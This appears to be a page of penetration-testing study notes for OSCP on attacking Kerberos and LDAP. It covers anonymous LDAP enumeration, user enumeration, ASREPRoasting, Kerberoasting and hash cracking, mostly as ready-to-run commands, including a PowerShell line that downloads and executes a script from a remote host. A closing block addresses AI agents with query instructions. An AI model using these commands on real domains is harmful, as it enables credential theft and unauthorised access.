# Kerberos Kerberos is an authentication mechanism protocol used by LDAP (basically Active Directory) we can test for anonymous LDAP queries binds and enumerate users and can perform other attacks ## Anonymous Binds * When LDAP and Kerberos ports are open, it's always a best practice to check for anonymous binds. When anonyomous binds are enabled, we can query information about the users and information about them. Sometimes the sysadmins tend to leave the user's password in their description section which will be a quick win if anonymous binds are enabled ```bash ldapsearch -h $ip -x -s base namingcontexts ldapsearch -h $ip -x -b "DC=domain,DC=tld" > ldap-anonymous ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' > ldap-people ``` **Machine:** Cascade - [Here](https://0xdf.gitlab.io/2020/07/25/htb-cascade.html#:~:text=croft%5D%20rid%3A%5B0x46f%5D-,LDAP%20%2D%20TCP%20389,-To%20enumerate%20LDAP) ## Kerberos Attacks ### ASREPRoasting {% hint style="info" %} Long story short, Kerberos authentication mechanism works by encrypting the timestamp with the user's password. And sending that encrypted timestamp to the server. The server decrypts the timestamp with the user's password and sends back a request with the user's password. The request sent by the server with the user's password is known as ASRESPonse. This ticket can be cracked offline to obtain the password of the user. *Fully Explained ( Youtube ) :* [*Here*](https://www.youtube.com/watch?v=pZSyGRjHNO4) {% endhint %} * Try to enumerate user names as much as possible * With the usernames try to generate the usernames with [username-anarchy](https://github.com/urbanadventurer/username-anarchy) * Once the valid usernames are obtained try to identify the valid usernames with [kerbrute](https://github.com/ropnop/kerbrute/releases/tag/v1.0.3) ```bash kerbrute userenum -d domain.tld usernames.txt | tee kerb.out # users.txt --> the username@domain.tld section from the kerb.out ``` * Once the valid usernames are identified perform `ASREPRoasting` ```bash impacket-GetNPUsers -usersfile users.txt domain.tld/ -outputfile getnpusers.txt ``` * With the obtained hash, the password for the user can be obtained by cracking with hashcat / john ```bash hashcat -m 18200 getnpusers.txt /usr/share/wordlists/rockyou.txt ``` ### Kerberoasting {% hint style="info" %} To perform kerberoasting a valid user credentials is required / an access to the machine is required {% endhint %} #### From Linux ```bash impacket-GetUserSPN domain.tld/username:password@$ip -dc-ip $ip -outputfile kerberoasting.hash ``` #### From Windows ```bash # With powerview iex(iwr -uri http://10.10.10.29/PowerView.ps1 -usebasicparsing) Get-NetUser -SPN # Rubeus .\Rubeus.exe kerberoast /outfile:kerberoasting.hash ``` #### Cracking ```bash hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dhaneshsivasamy07.gitbook.io/oscp-2022/enumeration/kerberos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.